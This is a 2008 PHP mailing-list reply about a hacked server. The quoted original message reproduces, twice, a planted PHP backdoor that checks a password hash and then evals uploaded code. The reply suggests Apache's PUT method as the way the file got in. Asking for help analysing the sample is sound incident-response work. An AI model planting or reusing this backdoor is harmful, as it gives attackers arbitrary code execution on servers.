Re: [PHP] Hack question

From: lists@xxxxxxxxx (Jim Lucas)
Date: Fri, 18 Apr 2008 13:09:43 -0700

Al wrote:

I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody".

I can sort of figure what is doing; but, I can't figure out what the hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
echo "$t\n";
} ;
function testdata($t)
{
say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
{
eval($code);
} else
{
testdata('f');
} ;
} else
{
testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>

Don't always assume it is PHP. Is Apache running as nobody? If so, it could be Apache using the PUT method to place the file in a writable directory.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare

.

References:
- Hack question
  - From: Al

Prev by Date: Re: [PHP] Re: Hack question
Next by Date: Re: [PHP] PHP5 and the DOM model
Previous by thread: Re: [PHP] Re: Hack question
Next by thread: PHP Pro Job-- Symfony/OOP/RAD
Index(es):
- Date
- Thread

Relevant Pages

RE: [PHP] Looking for help with forms/variables and an array!
... -> first initial query performed ... <?php do {?> ... where is your second form in this example? ... "Some men are born to greatness, some achieve greatness, ...
(php.general)
Re: [PHP] PHP calling an ISAPI Extension
... infer is when you draw a conclusion based on what one already knows. ... "Jim Lucas" wrote in message ... > also can't expect people to rebuild PHP with the curl library just to ... >> "Some men are born to greatness, some achieve greatness, ...
(php.general)
Re: [PHP] automatic caller
... I know I can do this with asterisk and it's php ... The name I think was phpvox. ... I did a quit google search but couldn't find any references. ... "Some men are born to greatness, some achieve greatness, ...
(php.general)
Re: [PHP] I know this is not easy and Im not stupid but...
... echo; ... [PHP] I know this is not easy and I'm not stupid but... ... "Some men are born to greatness, some achieve greatness, ...
(php.general)
Re: [PHP] Hack question
... The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody". ... I've changed all passwords and restricted ftp to two people. ... I would not allow the call to exec to be completed. ... "Some men are born to greatness, some achieve greatness, ...
(php.general)